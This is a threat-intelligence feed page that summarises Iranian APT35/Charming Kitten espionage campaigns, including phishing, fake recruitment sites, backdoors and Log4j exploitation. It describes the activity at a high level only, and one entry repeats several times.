Threats Feed
- Public
Iranian APT Impersonates German Model Agency in Espionage Operation
Suspected Iranian threat actors, likely linked to APT35 (Agent Serpens), created a fraudulent website impersonating Germany’s Mega Model Agency to conduct targeted espionage. The site collects extensive visitor data—including IP addresses, browser fingerprints, and screen resolutions—using obfuscated JavaScript to enable selective targeting. A fake model profile and inactive album link suggest planned social engineering attacks. Although no victim interaction was confirmed, the infrastructure and tactics indicate preparation for spear phishing. The campaign targets dissidents, journalists, and activists abroad, especially in Germany, aligning with the group’s history of surveillance and influence operations against Iranian opposition figures.
read more about Iranian APT Impersonates German Model Agency in Espionage Operation - Public
APT35 Targets Aerospace and Semiconductor Sectors Across Multiple Countries
APT35 targeted the aerospace and semiconductor industries in the US, Thailand, UAE, and Israel using fake recruitment and corporate websites. These sites delivered malware via forged legitimate programs and malicious DLLs to compromise victims. The group leveraged platforms like GitHub, OneDrive, and Google Cloud for C&C communications and payload delivery. In a related attack, a semiconductor company was targeted using a VPN program laced with malicious components. Persistence mechanisms included registry modifications, while obfuscation techniques were used to evade detection. APT35’s activities are linked to the Islamic Revolutionary Guard Corps (IRGC) of Iran.
read more about APT35 Targets Aerospace and Semiconductor Sectors Across Multiple Countries - Public
APT35 Targets Aerospace and Semiconductor Sectors Across Multiple Countries
APT35 targeted the aerospace and semiconductor industries in the US, Thailand, UAE, and Israel using fake recruitment and corporate websites. These sites delivered malware via forged legitimate programs and malicious DLLs to compromise victims. The group leveraged platforms like GitHub, OneDrive, and Google Cloud for C&C communications and payload delivery. In a related attack, a semiconductor company was targeted using a VPN program laced with malicious components. Persistence mechanisms included registry modifications, while obfuscation techniques were used to evade detection. APT35’s activities are linked to the Islamic Revolutionary Guard Corps (IRGC) of Iran.
read more about APT35 Targets Aerospace and Semiconductor Sectors Across Multiple Countries - Public
APT35 Targets Aerospace and Semiconductor Sectors Across Multiple Countries
APT35 targeted the aerospace and semiconductor industries in the US, Thailand, UAE, and Israel using fake recruitment and corporate websites. These sites delivered malware via forged legitimate programs and malicious DLLs to compromise victims. The group leveraged platforms like GitHub, OneDrive, and Google Cloud for C&C communications and payload delivery. In a related attack, a semiconductor company was targeted using a VPN program laced with malicious components. Persistence mechanisms included registry modifications, while obfuscation techniques were used to evade detection. APT35’s activities are linked to the Islamic Revolutionary Guard Corps (IRGC) of Iran.
read more about APT35 Targets Aerospace and Semiconductor Sectors Across Multiple Countries - Public
APT35 Targets Aerospace and Semiconductor Sectors Across Multiple Countries
APT35 targeted the aerospace and semiconductor industries in the US, Thailand, UAE, and Israel using fake recruitment and corporate websites. These sites delivered malware via forged legitimate programs and malicious DLLs to compromise victims. The group leveraged platforms like GitHub, OneDrive, and Google Cloud for C&C communications and payload delivery. In a related attack, a semiconductor company was targeted using a VPN program laced with malicious components. Persistence mechanisms included registry modifications, while obfuscation techniques were used to evade detection. APT35’s activities are linked to the Islamic Revolutionary Guard Corps (IRGC) of Iran.
read more about APT35 Targets Aerospace and Semiconductor Sectors Across Multiple Countries - Public
Charming Kitten’s TA455 Uses Social Engineering to Spread Malware in Aerospace Sector
ClearSky Cyber Security's research details an Iranian cyber campaign, dubbed "Iranian Dream Job," using fake job postings to target the aerospace industry. The campaign, active since at least September 2023, employs the SnailResin malware, leading to the SlugResin backdoor. Attribution is complex, with potential links to both Iranian group TA455 (a Charming Kitten subgroup) and North Korea's Lazarus group, raising questions about potential collaboration or deception. The campaign leverages fake LinkedIn profiles and websites, distributing malware via seemingly legitimate ZIP files containing a malicious executable. This sophisticated attack uses social engineering and DLL side-loading for infiltration.
read more about Charming Kitten’s TA455 Uses Social Engineering to Spread Malware in Aerospace Sector - Public
Charming Kitten Targets Global Sectors with Sponsor Backdoor
Charming Kitten, an Iran nexus threat actor group, used the Sponsor backdoor to target 34 entities across Brazil, Israel, and UAE. Initial access was gained by exploiting Microsoft Exchange vulnerabilities (CVE-2021-26855). The campaign targeted various sectors, including automotive, communications, engineering, financial services, healthcare, insurance, legal, manufacturing, retail, technology, and telecommunications. Sponsor backdoor, disguised as an updater program, used discreetly deployed batch files to evade detection. Charming Kitten also deployed tools like Plink, Merlin agent, Mimikatz, and Meterpreter reverse shells.
read more about Charming Kitten Targets Global Sectors with Sponsor Backdoor - Public
Charming Kitten's Cyber Arsenal: Tools and Techniques Explained
The Iranian APT group, Charming Kitten (APT35), targets human rights activities, academia, media organizations, and political entities in the US and Central Eastern countries. Notable attacks include the 2017 HBO hack, which led to leaked unaired TV episodes, and interference attempts in the 2019 US elections, primarily targeting email accounts. Tools used by APT35 include DownPaper, which utilizes PowerShell and registry manipulation, Mimikatz for credential dumping, PsExec for remote execution, and PupyRAT for cross-platform control via phishing techniques.
read more about Charming Kitten's Cyber Arsenal: Tools and Techniques Explained - Public
Charming Kitten Exploits Phishing to Target Global Academia and Activists
This Certfa Lab report details the cyber espionage activities of Charming Kitten (APT42), an Iranian state-sponsored hacking group. The report focuses on four specific operations ("Alfa," "Bravo," "Charlie," and "Delta"), illustrating how Charming Kitten uses sophisticated social engineering, primarily impersonating prominent individuals on LinkedIn and Twitter, to build trust with targets before delivering malicious links disguised as innocuous meeting requests or research materials. The attacks consistently leverage phishing to steal credentials, targeting researchers, academics, activists, and journalists with a particular focus on the Middle East and North Africa. The report aims to raise public awareness of Charming Kitten's tactics and provide recommendations for enhancing online security, particularly emphasizing the use of multi-factor authentication.
read more about Charming Kitten Exploits Phishing to Target Global Academia and Activists - Public
CharmPower: APT35's Modular Toolset Exploits Log4j Vulnerability
APT35 has started widespread scanning and attempts to leverage the Log4j flaw in publicly facing systems only four days after the vulnerability was disclosed. The group used a modular PowerShell-based framework dubbed CharmPower for persistence, information gathering, and command execution.
read more about CharmPower: APT35's Modular Toolset Exploits Log4j Vulnerability - Public
APT35 Cyber Espionage: From Phishing to Spyware and Beyond
APT35 has used multiple tactics to compromise high-value targets. The group has used hijacked websites, such as one affiliated with a UK university, for credential phishing attacks. They have also uploaded spyware disguised as VPN software to app stores and impersonated conference officials to conduct phishing campaigns. Additionally, APT35 has utilized link shorteners and click trackers embedded within PDF files and abused services like Google Drive, App Scripts, and Sites pages. The group has adopted a novel approach by leveraging Telegram for real-time operator notifications, enabling them to monitor visitor information to their phishing sites.
read more about APT35 Cyber Espionage: From Phishing to Spyware and Beyond